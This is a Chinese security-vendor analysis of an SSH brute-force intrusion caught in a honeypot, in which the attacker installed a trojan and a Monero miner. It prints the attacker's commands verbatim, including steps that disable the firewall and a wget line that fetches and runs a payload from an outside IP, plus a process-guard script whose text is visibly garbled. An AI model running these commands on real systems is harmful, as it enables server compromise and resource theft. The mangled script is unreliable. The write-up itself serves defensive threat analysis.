服务热线
15527777548/18696195380
前言
虚拟货币自诞生以来,就与黑产有着说不清道不明的关系,从一开始充当地下交易的介质,到成为逃避追踪的勒索病毒的钱包,利益之所向,必是黑产之跟随。
随着虚拟货币在市场中的价格节节攀升,越来越多的黑产也不满足于使用虚拟货币,转而投身于挖矿的大军中去。
当然,黑产们本身并不具备生产虚拟货币的必要条件,所以他们动起了肉鸡挖矿的心思,虽然服务器质量层次不齐,但聚沙成塔,积少成多,矿池的出现更是大大方便了黑产们挖矿的脚步。
起
最近,安恒威胁情报小组在蜜罐系统中发现黑产挖矿的踪迹。黑产dalao,我一个搞网络安全的,你挖矿挖我这儿来了,是不是有点儿飘?要battle吗?
某日,黑产的自动爆破脚本费劲了千辛万苦,终于成功突破了蜜罐(程序猿小哥钓鱼中...)。按照惯例,黑产们喜欢先查看一下机器的配置和性能。
cat /proc/cpuinfo
free –m
24核48线程的cpu和高达128G的内存,一定会让他激动不已(程序猿小哥持续钓鱼...)
先来一套关闭防火墙连招,iptabeles和SuSEfirewall通通关掉。
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
接下来上wget,下载文件并执行,清除历史记录(可惜被我们蜜罐记录的清清楚楚)。
chattr -i /usr/bin/wget
chmod 755 /usr/bin/wget
yum install -y wget
pkill sysxlv
rm -f /etc/sysxlv
rm -f /etc/sysxlv.1
wget -c -P /etc/ http://111.73.45.73:9789/sysxlv
chmod 755 /etc/sysxlv
nohup /etc/sysxlv > /dev/null 2> then
echo ""
else
echo "sh $host_dir/jourxlv do
Centos_sshd_killn=$(psaux |grep"$host_dir/sysxlj"|grep-v grep |wc-l)
if [[$Centos_sshd_killn-eq0]]; then
if[ !-f"$host_dir/sysxlj"]; then
if[ -f"/usr/bin/aher"]; then
cp/usr/bin/aher $host_dir/sysxlj
chmod755 ./sysxlj
else
echo "No weeget"
fi
fi
./sysxlj then
forkilled in $(psaux |grep"$host_dir/sysxlj"|grep-v grep |awk'{print $2}');do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[$Centos_sshd_killn-eq1]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
通过前面的分析我们可以知道,gates木马自身带有完善的开机自启,进程防杀的功能,所以虽然这个名为sysxlj的程序,和gates木马sysxlv很像,但是大概率不是同一个程序,外加我们还发现了挖矿的配置脚本,我们有理由推测,sysxlj这个程序应该是用来门罗币挖矿,而且,从配置来看,会大量占用服务器的cpu(75%)。
通过搜索sysxlj,我们在网上发现了这么一条消息:
这也恰好应证了我们的猜想。
合
本来以为这是一个抓鸡放马的小黑产,没想到真正的目的是来利用我们服务器剩余资源来挖取门罗币。
下面来总结一下本次攻击的整个过程:
1.通过ssh爆破的方式,大规模扫描网段,尝试获取服务器shell;
2.进入机器后首先关闭iptables和SuSEfirewall防火墙;
3.使用wget从其本地的服务器下载ddos木马,修改权限并运行;
4.下载挖矿程序,配置信息,进程守护脚本,在后台利用服务器资源挖矿;
5.删除日志信息。
下面是有关本次入侵ip的信息:
该ip来自江西上饶,被我们情报团队以及多个开源情报标记为恶意主机。
下面是有关本次入侵文件的信息:
防御的建议:
1.杜绝ssh弱口令,并且定期更换;
2.订购威胁情报,获取ssh爆破黑名单,一键屏蔽;
3.日志备份,定期查看是否存在大量占用系统资源的进程。
*本文作者:安恒风暴中心,转载请注明来自FreeBuf.COM
